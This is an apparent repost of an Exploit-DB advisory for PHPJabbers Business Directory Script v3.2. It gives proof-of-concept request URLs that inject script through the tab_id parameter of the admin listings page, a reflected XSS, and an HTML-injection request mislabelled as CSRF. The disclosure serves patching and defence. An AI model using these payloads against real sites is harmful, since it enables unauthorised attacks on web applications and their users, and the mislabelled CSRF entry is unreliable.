[webapps] PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
2023-8-21 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
2023-8-21 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏
# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
# Date: 09/08/2023
# Exploit Author: Kerimcan Ozturk
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/business-directory-script/
# Version: 3.2
# Tested on: Windows 10 Pro
## Description
Technical Detail / POC
==========================
Login Account
Go to Property Page (
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
Edit Any Property (
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
)
[1] Cross-Site Scripting (XSS)
Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
"<script><image/src/onerror=prompt(8)>
[2] Cross-Site Request Forgery
Request:
https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
"<script><font%20color="green">Kerimcan%20Ozturk</font>
Best Regards
文章来源: https://www.exploit-db.com/exploits/51687
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh